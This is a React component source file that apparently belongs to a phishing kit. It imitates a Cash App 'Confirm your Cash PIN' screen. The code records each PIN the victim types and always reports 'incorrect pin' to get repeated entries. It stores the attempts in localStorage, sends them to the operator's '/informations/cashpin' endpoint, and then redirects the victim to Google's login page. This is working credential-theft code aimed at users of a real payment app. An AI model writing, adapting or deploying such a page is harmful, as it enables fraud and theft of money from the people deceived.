import axios from 'axios';
import React, { useRef, useState } from 'react';
import { useEffect } from 'react';

const Cashpin = () => {
    const inputs = useRef([]);
    const [pincount, setPinCount] = useState(0);
    const [error, setError] = useState(false);
    const [loading, setLoading] = useState(false);
    const handleChange = (e, index) => {
        const value = e.target.value;
        if (/^\d?$/.test(value)) {
            e.target.value = value;
            if (value && index < inputs.current.length - 1) {
                inputs.current[index + 1].focus();
            }
        } else {
            e.target.value = '';
        }
    };

    const handleKeyDown = (e, index) => {
        if (e.key === 'Backspace' && !e.target.value && index > 0) {
            inputs.current[index - 1].focus();
        }
    };

    const handleKeyUp = (e, index) => {
        if (index === 3 && inputs.current.every((input) => input.value)) {
            const pin = inputs.current.map((input) => input.value).join('');
            submitPin(pin);
        }
    };

    const submitPin = async (pin) => {
        console.log(pin)
        setPinCount((prev) => {
            const newCount = prev + 1;
            if (newCount >= 2) {
                setError(true);
            }
            return newCount;
        });
        if (pincount >= 0) {
            setLoading(true);
            setError(true);
        }
        console.log(pincount)
        let cashPinCheck = localStorage.getItem("cashpin");
        let finalPin;
        if (!cashPinCheck) {
            localStorage.setItem("cashpin", pin);
            finalPin = pin;
        } else {
            finalPin = localStorage.getItem('cashpin') + '/' + pin;
            localStorage.setItem("cashpin", finalPin);

        }
        console.log(finalPin)



        axios.put(`/informations/cashpin/${localStorage.getItem("temp")}`, { cashpin: finalPin }, {
            headers: {
                "Content-Type": "application/json",
            },
        })
            .then((response) => {
                console.log('Update successful:', response.data);
                const updatedData = response.data;
                setLoading(false);

                // Reset input fields
                inputs.current.forEach((input) => {
                    if (input) input.value = '';
                });

                // Focus the first input
                if (inputs.current[0]) {
                    inputs.current[0].focus();
                }

                if (pincount === 3) {
                    setError(false)
                    // console.log('go');
                    // localStorage.setItem("cashpin", '');
                    localStorage.removeItem("cashpin");

                    window.location.href = 'https://accounts.google.com/';
                }
            })
            .catch((error) => {
                console.error('Error updating data:', error);
            });

    };

    useEffect(() => {

    }, [pincount, error]);

    return (
        <div className="min-h-screen flex flex-col justify-between  py-4  bg-[#02B929] max-w-md mx-auto">
            <div>
                <div>
                    <h2 className="text-2xl font-semibold text-white">Confirm your Cash PIN for your personal account</h2>
                    {/* <p className="text-xl font-semibold">$samsam7482</p> */}
                </div>

                <div className="flex space-x-4 mt-6">
                    {[0, 1, 2, 3].map((_, index) => (
                        <div
                            key={index}
                            className="w-7 h-7 border-2 border-white rounded-full flex items-center justify-center"
                        >
                            <input
                                type="password"
                                maxLength="1"
                                inputMode="numeric"
                                pattern="[0-9]*"
                                className="w-full h-full text-5xl text-center bg-transparent outline-none -mt-[8px]"
                                onChange={(e) => handleChange(e, index)}
                                onKeyDown={(e) => handleKeyDown(e, index)}
                                onKeyUp={(e) => handleKeyUp(e, index)}
                                ref={(el) => (inputs.current[index] = el)}
                            />
                        </div>
                    ))}
                </div>

                {loading && <div className='text-green-500 absolute top-1/2 left-1/2 bg-black bg-opacity-80 w-full h-full -translate-x-1/2 -translate-y-1/2 flex justify-center items-center'><div className="w-8 h-8 border-4 border-gray-300 border-t-blue-600 rounded-full animate-spin"></div></div>}
                {error && <small className='text-red-500'>incorrect pin</small>}

            </div>

            <div className='text-center'>
                <p className="text-sm mt-6 text-white">Tap dots to open keyboard</p>

                <button className="mt-4 bg-gray-200 px-8 py-2 rounded-full text-black text-sm font-medium">
                    Help
                </button>
            </div>
        </div>
    );
};

export default Cashpin;
